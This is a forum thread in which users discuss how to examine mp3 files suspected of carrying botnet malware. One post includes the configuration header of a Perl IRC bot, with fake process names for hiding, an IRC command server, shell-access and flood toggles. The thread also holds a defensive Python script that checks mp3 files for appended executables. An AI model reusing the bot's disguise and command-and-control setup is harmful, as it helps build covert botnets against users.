
The website is Evil but what to do??


rok

Newbie

Posts: 39

Joined: Sun Apr 27, 2008 2:18 am

Post Tue Jan 06, 2009 6:52 am

The website is Evil but what to do??

Hello guys,

How are you guys? OK, let's come to the point. I have a situation. I have identified a website. It's a song download website, and they are spreading a virus with those music files. The site has almost 1,200,000 members, so they have easily created a huge botnet, and they are still infecting and spreading the virus and making the botnet bigger. Can anyone tell me what I can do in this situation? I need to exploit the botnet or the group and report it to the police, so what forensic tests can I do? Please suggest, and anyone who wants to help me can ping me. It would be very nice of the ethicalhacker forum. I hope what I said here is ethical. Please help me, and I need to do it fast because they might start attacking at any point of time.

jimbob

Post Tue Jan 06, 2009 7:00 am

Re: The website is Evil but what to do??

Hi there Rok,
One thing you can do if you have a sample of the malware in question you should submit it to the AV software companies. That way it will be added to their virus signatures so it can be detected.

You have to be certain that it is malware before making any accusations. Many such websites have a usage policy which expressly allows them to install adware/spyware. If a user signs up and accepts the agreement then the activity may be legit. There are lots of resources out there and on the forum for malware analysis, try reading up on them and attempt an analysis if you like. Be careful though, exercise caution and try to keep your lab as isolated as possible.

Regards,
Jim

rok

Newbie

Posts: 39

Joined: Sun Apr 27, 2008 2:18 am

Post Thu Jan 08, 2009 6:09 am

Re: The website is Evil but what to do??

Hello Jim,
Thanks for your reply.

Can you give me much more information? I have got .mp3 files here. I want to read the entire code of that .mp3 file. Can you tell me any way that is possible and simple enough for that? I assume the attackers may have injected a good amount of code into that file so that it can join any IRCd and channel and work as per the botmaster. I want to know the code. It may be encrypted, but at this point in time I only have one way to go, and that is to look at the code. There must be something similar to this....


#!/usr/bin/perl
# Configuration header of a Perl IRC bot ("Stealth ShellBot") as posted in the
# thread. The variable names are Portuguese; translations are in the comments.
# The helper subs getnick() and getident2() are not part of the posted fragment,
# so placeholder definitions are added at the bottom only so the file compiles.
use strict;
use warnings;

# Fake process names the bot renames itself to, so it blends into `ps` output
my @ps = ("/usr/local/apache/bin/httpd -DSSL", "/sbin/syslogd", "[eth0]",
          "/sbin/klogd -c 1 -x -x", "/usr/sbin/acpid", "/usr/sbin/cron", "[bash]");
my $processo = $ps[rand scalar @ps];    # processo = process name, chosen at random

our $servidor;                          # servidor = C&C IRC server
$servidor = 'irc.lol.com' unless $servidor;
my $porta  = '6667';                    # porta = port
my @canais = ("#CANAL");                # canais = channels to join
my @adms   = ("ADMIN");                 # adms = nicks allowed to give the bot commands

# Anti-flood (6/3 recommended): max lines per burst, then sleep this many seconds
my $linas_max = 10;
my $sleep     = 3;

my $nick     = getnick();
my $ircname  = getident2();
my $realname = "windows nt 5.1 build 2600";   # fake "real name" shown in WHOIS
#chop (my $realname = `uname -n`);

my $acessoshell = 1;                    # acessoshell = shell access enabled
######## Stealth ShellBot ##########
my $prefixo      = "!all";              # prefixo = command prefix
my $estatisticas = 0;                   # estatisticas = statistics
my $pacotes      = 1;                   # pacotes = packet (flood) commands enabled
####################################

# Placeholders: the real definitions are not in the posted fragment
sub getnick   { return "bot"  . int(rand(10000)); }
sub getident2 { return "user" . int(rand(10000)); }


Maybe something like this... Please help: how can I look at the code of that .mp3 file?

NickFnord


Full Member

Posts: 117

Joined: Fri Sep 05, 2008 5:25 am

Post Thu Jan 08, 2009 6:59 am

Re: The website is Evil but what to do??

That's a massive assumption you're making there....

As far as I'm aware, exploits using mp3s are similar to the ones using image files that you asked about in July last year.

As an mp3 is just a file format (http://en.wikipedia.org/wiki/Mp3#File_structure / http://www.mpgedit.org/mpgedit/mpeg_for ... ormat.html), the mp3 would have to exploit a specific buffer overflow or some other vulnerability in order to start executing. I remember something like this happening in Winamp a while back, but haven't heard anything recently about this being possible in any popular mp3 players.

You can open the mp3 in a hex editor to see what's in it. If you think it contains exploit code, then you can look at it in a disassembler or do any number of system-level reversing tricks in a virtual machine.
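Jim's advice (hash the sample and send it to the AV vendors) and Nick's point (an mp3 is a container, so read the bytes instead of guessing) can be combined into a small triage step. The script below is an added example written for this page, not code from the thread or from any of the posters. It parses the leading ID3v2 tag, walks the MPEG-1 Layer III frames, and reports what is left over: a tag payload, bytes appended after the last audio frame, or a file that only carries the .mp3 extension (a PE, an ELF, a ZIP, or an ASF/WMA container). Those non-audio regions are the only places scanned for executable and script markers, because compressed audio can contain any byte pair by chance. The helper names (`triage`, `build_sample`, `frame_length`) and the sample inputs are my own; the samples are constructed in the block and contain no real malware. Limitation, also an assumption of the example: only MPEG-1 Layer III frames are understood, so a file using MPEG-2 or another layer will stop the walk early and show up as "trailing data".

```python
"""Triage of a suspected malicious .mp3 (added example, not from the thread).

Parses the ID3v2 header and walks MPEG-1 Layer III frames so that everything
that is *not* audio (tag payload, data appended after the last frame, or a file
that merely carries the .mp3 extension) can be inspected separately. Sample
inputs are constructed inline below; no real malware is involved.
"""
import hashlib

# Magic values for things that are not MPEG audio but sometimes ship as ".mp3".
FOREIGN_MAGIC = {
    b"MZ": "DOS/PE executable (renamed .exe?)",
    b"\x7fELF": "ELF executable",
    b"#!": "script with shebang",
    b"PK\x03\x04": "ZIP archive",
    bytes.fromhex("3026B2758E66CF11A6D900AA0062CE6C"): "ASF/WMA container, not MPEG audio",
}

# MPEG-1 Layer III only (the common case); index 0 = free format, 15 = invalid.
MPEG1_L3_BITRATES = [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, None]
MPEG1_SAMPLE_RATES = [44100, 48000, 32000, None]


def id3v2_length(data):
    """Total byte length of a leading ID3v2 tag, or 0 if there is none."""
    if len(data) < 10 or data[:3] != b"ID3":
        return 0
    size_bytes = data[6:10]
    if any(b & 0x80 for b in size_bytes):   # syncsafe integer: top bit of each byte is 0
        return 0
    size = 0
    for b in size_bytes:
        size = (size << 7) | b
    footer = 10 if data[5] & 0x10 else 0    # ID3v2.4 "footer present" flag
    return 10 + size + footer


def frame_length(hdr):
    """Byte length of an MPEG-1 Layer III frame starting with hdr, else None."""
    if len(hdr) < 4 or hdr[0] != 0xFF or (hdr[1] & 0xE0) != 0xE0:   # 11-bit frame sync
        return None
    version = (hdr[1] >> 3) & 3   # 3 = MPEG-1
    layer = (hdr[1] >> 1) & 3     # 1 = Layer III
    if version != 3 or layer != 1:
        return None
    bitrate = MPEG1_L3_BITRATES[hdr[2] >> 4]          # kbit/s
    sample_rate = MPEG1_SAMPLE_RATES[(hdr[2] >> 2) & 3]
    padding = (hdr[2] >> 1) & 1
    if not bitrate or not sample_rate:
        return None
    return 144000 * bitrate // sample_rate + padding


def triage(data):
    """Return a dict describing which parts of data are audio and which are not."""
    report = {"sha256": hashlib.sha256(data).hexdigest(), "findings": [], "frames": 0}
    for magic, desc in FOREIGN_MAGIC.items():
        if data.startswith(magic):
            report["findings"].append("file starts with " + desc)
            report["trailing_bytes"] = len(data)
            return report
    tag_len = id3v2_length(data)
    pos = tag_len
    while pos + 4 <= len(data):
        n = frame_length(data[pos:pos + 4])
        if n is None or pos + n > len(data):
            break                      # not a frame we understand, or a truncated one
        pos += n
        report["frames"] += 1
    trailing = data[pos:]
    report.update(id3v2_bytes=tag_len, audio_bytes=pos - tag_len, trailing_bytes=len(trailing))
    # Scan only the non-audio regions: compressed audio can contain any byte
    # sequence by chance, so scanning the frames would mostly produce false hits.
    for name, region in (("ID3v2 tag", data[10:tag_len]), ("trailing data", trailing)):
        for magic, desc in FOREIGN_MAGIC.items():
            off = region.find(magic)
            if off != -1:
                report["findings"].append("%s at offset %d in %s" % (desc, off, name))
    if report["frames"] == 0:
        report["findings"].append("no MPEG-1 Layer III frames found")
    return report


def build_sample(frames=5, trailer=b""):
    """Constructed input: empty ID3v2.3 tag + 128 kbit/s, 44.1 kHz frames (417 bytes each)."""
    tag = b"ID3\x03\x00\x00" + b"\x00\x00\x00\x00"
    frame = b"\xff\xfb\x90\x00" + b"\x00" * 413
    return tag + frame * frames + trailer


if __name__ == "__main__":
    samples = {
        "clean": build_sample(),
        "pe_appended": build_sample(trailer=b"MZ\x90\x00" + b"\x00" * 60),
        "really_asf": bytes.fromhex("3026B2758E66CF11A6D900AA0062CE6C") + b"\x00" * 16,
    }
    for label, blob in samples.items():
        print(label, triage(blob))
```

Read the output as a prompt to look, not as a verdict: a large trailing region or an oversized tag is where a hex editor session should start, and the SHA-256 is what goes with the sample when it is submitted to the AV vendors. An appended blob does not execute on its own; as Nick says, a bug in the player is still needed for the file to do anything, so a non-audio finding means "examine this in an isolated VM", not "this is a bot".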
